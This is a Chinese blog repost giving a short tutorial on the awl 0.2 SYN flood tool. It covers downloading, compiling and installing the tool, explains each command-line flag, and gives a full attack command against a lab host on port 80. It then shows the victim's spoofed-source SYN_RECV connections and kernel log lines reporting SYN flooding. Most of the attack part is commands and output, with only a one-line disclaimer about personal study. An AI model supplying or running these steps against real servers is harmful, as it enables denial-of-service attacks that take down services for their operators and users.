SYN Flood工具之awl简单使用!

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SYN Flood工具之awl简单使用!相关的知识,希望对你有一定的参考价值。

下载包:

wget 

[[email protected] ~]# ll

总用量 292

-rw-r--r-- 1 root root 296340 9月   8 10:28 awl-0.2.tar_vhcFaEwRuq7S.gz

[[email protected] ~]# tar xf awl-0.2.tar_vhcFaEwRuq7S.gz 

[[email protected] ~]# cd awl-0.2

[[[email protected] awl-0.2]#

[[email protected] awl-0.2]# ./configure && make&& make install

[[email protected] ~]# aw

awk  awl  

[[email protected] ~]# aw

参数如下:

-i 发送包的接口,如果省略默认是eth0

-m 被攻击机器的mac地址,程序不能根据被攻击IP得到MAC,需要手工指定.先ping 目标IP,再arp -a就可以看到.如果省略则为ff:ff:ff:ff:ff:ff

-d 被攻击机器的IP

-p 被攻击机器的端口.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

攻击者:


[[email protected]yuan ~]# awl -i eth0 -m 00:0c:29:39:ce:a4 -d 192.168.1.218 -p 80

被攻击者:

tcp        0      0 192.168.1.218:80            6.5.128.103:29105           SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            123.146.105.97:11200        SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            162.103.151.22:13540        SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            114.6.226.115:4986          SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            8.38.204.32:9703            SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            79.198.242.55:43912         SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            26.145.249.31:35158         SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            192.2.151.95:17551          SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            116.246.148.67:45865        SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            91.119.159.10:960           SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            81.0.9.64:39621             SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            167.18.151.54:43510         SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            210.94.41.57:53857          SYN_RECV    -                   

tcp        0      0 192.168.1.218:80            51.126.4.52:53039           SYN_RECV    - 

技术分享

[[email protected] ~]# tail -f /var/log/messages 

Feb 21 09:31:15 node3 yum[1432]: Installed: apr-util-1.3.9-3.el6_0.1.x86_64

Feb 21 09:31:15 node3 yum[1432]: Installed: apr-util-ldap-1.3.9-3.el6_0.1.x86_64

Feb 21 09:31:15 node3 yum[1432]: Installed: httpd-tools-2.2.15-54.el6.centos.x86_64

Feb 21 09:31:15 node3 yum[1432]: Installed: mailcap-2.1.31-2.el6.noarch

Feb 21 09:31:19 node3 yum[1432]: Installed: httpd-2.2.15-54.el6.centos.x86_64

Feb 21 09:37:07 node3 kernel: possible SYN flooding on port 80. Sending cookies.

Feb 21 09:38:07 node3 kernel: possible SYN flooding on port 80. Sending cookies.

Feb 21 09:39:56 node3 yum[1515]: Installed: wget-1.12-8.el6.x86_64

Feb 21 09:55:26 node3 kernel: possible SYN flooding on port 80. Sending cookies.

Feb 21 09:58:05 node3 kernel: possible SYN flooding on port 80. Sending cookies.


声明:仅仅为了个人学习,请大家不要恶意攻击别人的服务器。

本文出自 “[email protected]” 博客,谢绝转载!

以上是关于SYN Flood工具之awl简单使用!的主要内容,如果未能解决你的问题,请参考以下文章

Linux使用awl0.2进行局域网SYN进行洪水ATT

awl多进程SYN攻击

SYN Flood 防范

如何防范tcp syn flood 攻击

利用iptables防止syn flood攻击

浅谈iptables防SYN Flood攻击和CC攻击